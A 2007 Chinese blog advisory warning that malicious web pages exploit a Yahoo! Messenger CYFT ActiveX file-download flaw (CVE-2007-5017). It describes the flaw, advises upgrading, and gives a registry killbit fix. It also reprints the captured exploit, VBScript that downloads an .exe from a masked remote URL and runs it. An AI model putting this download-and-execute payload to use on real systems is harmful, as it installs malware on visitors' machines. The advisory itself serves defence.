百度空间 | 百度首页 
               
 
查看文章
 
紧急预警:利用Yahoo! Messenger 8.1.0 ActiveX控件漏洞挂马的病毒已经出现!
2007-09-26 09:40

紧急预警:利用Yahoo! Messenger 8.1.0.421 CYFT ft60.dll ActiveX控件GetFile方式任意文件上传漏洞挂马的病毒已经出现!

从恶意网址检测的消息,发现了一个恶意网址使用“雅虎通CYFT ft60.dll ActiveX控件GetFile方式任意文件上传漏洞进行挂马,再次提醒广大用户警惕,请将Yahoo! Messenger 升级到最新版本,目前该软件最新版本为雅虎通8.3正式版。

该恶意网址的EXP代码如下:

<pre>
              <object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
              test.GetFile "http://***.exe","c:\\***.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"uu.exe"
</script>
</pre>

雅虎通的CYFT ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞向用户系统上传任意文件。CYFT ActiveX控件的GetFile()方式没有对用户提交的参数做充分的检查过滤,远程攻击者可以通过提供畸形参数向用户系统的任意位置上传任意文件,但是相关的控件默认情况下不能远程调用。

该漏洞是由shinnai (shinnai@autistici.org)发现的。

该漏洞的CVE数据库信息CVE-2007-5017:http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5017

该漏洞在milw0rm上的Shellcode代码:Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download

解决方案:

请下载最新版本的Yahoo! Messenger ,官方下载地址:http://cn.messenger.yahoo.com/

或者在注册表中设置killbit :

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{24F3EAD6-8B87-4C1A-97DA-71C126BDA08F}]
"Compatibility Flags"=dword:00000400


类别:漏洞分析 | 添加到搜藏 | 浏览() | 评论 (3)
 
最近读者:
 
网友评论:
1
2007-09-26 13:05 | 回复
不错不错~~~~~~顶!
 
2
2007-09-28 12:05 | 回复
很喜欢你的博客,希望以后可以看到更多好咚咚,祝开心哦!
 
3
2007-10-11 13:00 | 回复
比较恐怖,这两个我都常用
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu